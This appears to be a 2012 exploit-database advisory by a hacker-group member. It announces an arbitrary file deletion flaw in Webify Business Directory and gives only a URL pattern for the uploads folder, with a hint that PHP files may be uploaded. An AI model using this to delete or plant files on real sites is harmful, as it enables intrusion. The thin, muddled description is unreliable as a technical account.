id: 19388
date: 09/12/2012
title: Webify Business Directory Arbitrary File Deletion Vulnerability
author: JiKo
cves: 

#########################################################################################
[!x!] Informations: 
Name           : Webify business directory
Download       : http://webify.ws/businessdirectory
Vulnerability  : Delete Arbitrary File Vulnerability
Author         : JIKO(JAWAD)
Contact        : jalikom@hotmail.com
Site           : No-ExploiT.CoM (Is Back)
Notes          : No-ExploiT.CoM
#########################################################################################
[!x!] Bug: Delete Arbitrary File Vulnerability   you can delete file uploaded in post and upload your files (for php if allowed you can :))   #########################################################################################
[!x!] Exploit:  Exploit: http://server/businessdirectory/uploads/X/ change X with number of post    ########################################################################################
[!x!] To: All friendsCyber_Devil Allah with you members [No-exploit.Com] 



#  0day.today [2023-03-25]  #